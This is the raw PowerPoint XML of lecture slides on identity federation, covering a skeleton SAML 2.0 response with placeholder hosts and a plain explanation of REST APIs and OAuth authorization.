            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="319313"/>
            <a:ext cx="9591902" cy="4484915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41210269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6893C-FBE9-4162-1773-8D0AACB7C84D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Federation</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 299">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22096E2-4A81-9283-96FF-51F0D37F72D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="319313"/>
            <a:ext cx="9867674" cy="4383315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1017994925"/>
      </p:ext>
    </p:extLst>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11E93-995C-053D-B5C7-E86CE5E708AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582612" y="4937275"/>
            <a:ext cx="8534400" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Security Assertion Markup Language</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0361B6BE-9DD7-5592-7700-BEF59531FC64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="190500"/>
            <a:ext cx="9250363" cy="5219700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>samlp:Response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xmlns:samlp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="urn:oasis:names:tc:SAML:2.0:protocol“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xmlns:saml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="urn:oasis:names:tc:SAML:2.0:assertion" ID="200" Version="2.0“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IssueInstant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="2020-01-01T20:00:10Z “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Destination="https://sp.foo/saml/acs" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>InResponseTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="100".</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saml:Issuer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;https://idp.foo/sso&lt;/saml:Issuer&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ds:Signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;...&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ds:Signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>samlp:Status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;...(success)...&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>samlp:Status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saml:Assertion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D2E46"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>xmlns:xsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>="http://www.w3.org/2001/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>XMLSchema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>-instance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D2E46"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>xmlns:xs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>="http://www.w3.org/2001/XMLSchema"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ID="2000" Version="2.0“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IssueInstant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="2020-01-01T20:00:09Z"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saml:Issuer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;https://idp.foo/sso&lt;/saml:Issuer&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ds:Signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;...&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ds:Signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saml:Subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;... &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saml:Conditions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;...</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saml:AudienceRestriction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;... &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saml:AuthnStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;...</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saml:AttributeStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saml:Attribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;...</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saml:Attribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;... &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saml:AttributeStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saml:Assertion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>samlp:Response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19332510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1E3A0-EBCF-60A7-3016-A5F3CDC4412E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Open Authorization</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F52C413E-0C76-FD96-E3BC-E09C4C0AEC40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="685800"/>
            <a:ext cx="10225088" cy="4025900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many public clouds use application programming interfaces (APIs) based on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Representational State Transfer (REST)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> rather than SOAP. These are called RESTful APIs. Where SOAP is a tightly specified protocol, REST is a looser architectural framework. This allows the service provider more choice over implementation elements. Compared to SOAP and SAML, there is better support for mobile apps.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication and authorization for a RESTful API are often implemented using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Open Authorization (OAuth)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> protocol. OAuth is designed to facilitate sharing of information (resources) within a user profile between sites. The user creates a password-protected account at an identity provider (IdP). The user can link that identity to an OAuth consumer site without giving the password to the consumer site. A user (resource owner) can grant an OAuth client authorization to access some part of their account. A client in this context is an app or consumer site.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17674838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3C080-BC49-F9BF-CCD7-D4607A554884}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
